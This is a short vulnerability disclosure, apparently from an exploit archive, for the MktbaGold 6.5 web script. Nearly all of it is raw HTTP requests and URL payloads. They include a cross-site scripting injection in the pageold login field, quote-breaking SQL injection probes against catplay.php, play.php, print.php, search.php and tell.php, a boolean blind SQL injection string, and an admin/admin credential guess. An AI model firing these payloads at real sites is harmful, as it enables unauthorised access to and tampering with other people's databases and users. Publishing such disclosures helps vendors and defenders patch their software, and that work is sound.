facebook facebook twitter rss

MktbaGold 6.5 - Cross Site Scripting - SQL injection - Blind SQL Injection

Author: Dr.web , Published: 25-10-2014
***************************************************
# Title: MktbaGold 6.5 - Cross Site Scripting - SQL injection - Blind SQL Injection
# Author: Dr.web
# Vendor Homepage: http://www.mktbagold.com/
# Contact: u8p@hotmail.com ; skype: dr.web559
# Greets To: Brg alshmail - a!7rBi - x_man_3r3r - Hannibal Ksa - QaTaR-Attack - mr.hx - XP - r3m0t3Nu11 - xdr.devilx - lov3rdns - xSecurity
***************************************************
a) Cross Site Scripting POST
parameters Infected ( pageold )
POST /user.php?action=login HTTP/1.1
Content-Length: 58
Content-Type: application/x-www-form-urlencoded
Host: localhost.net
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

POST
pageold=%22%20onmouseover%3dprompt%28944582%29%20bad%3d%22
b) SQL injection
file infected : catplay.php
parameters Infected sqli (catsmktba)
#exp : http://localhost/mktbagold/catplay.php?catsmktba=%f0%27%27%f0%22%22

c) SQL injection POST
file infected : play.php
parameters Infected sqli ( styleidP )
POST /play.php?catsmktba=1651 HTTP/1.1
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
Host: localhost.net
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
POST
styleidP=1%27%22

b) SQL injection
file infected : print.php
parameters ( id )
#exp : http://localhost/mktbagold/print.php?id=1##xa7##

f) SQL injection POST
file infected : search.php
parameters ( styleidP )
POST /search.php HTTP/1.1
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
Host: localhost.net
Connection: Keep-alive
Accept: */*

POST
styleidP=1%27%22

d) SQL injection POST
file infected : tell.php
parameters ( styleidP )

POST /tell.php HTTP/1.1
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
Host: localhost.net
Connection: Keep-alive
Accept: */*

POST
styleidP=1%27%22

s) Blind SQL Injection POST
file infected : search.php
parameters ( styleidP )

POST /search.php HTTP/1.1
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Host: localhost.net
Connection: Keep-alive
Accept: */*

POST
styleidP=227%27%20and%2033-33%20%3d%20%270


h) Guess making tool
user.php?action=login
UserName=admin&Password=admin&SignIn=%CA%D3%CC%ED%E1+%C7%E1%CF%CE%E6%E1&pageold=%2Fuser.php%3Faction%3Dlogin

Like us on Facebook :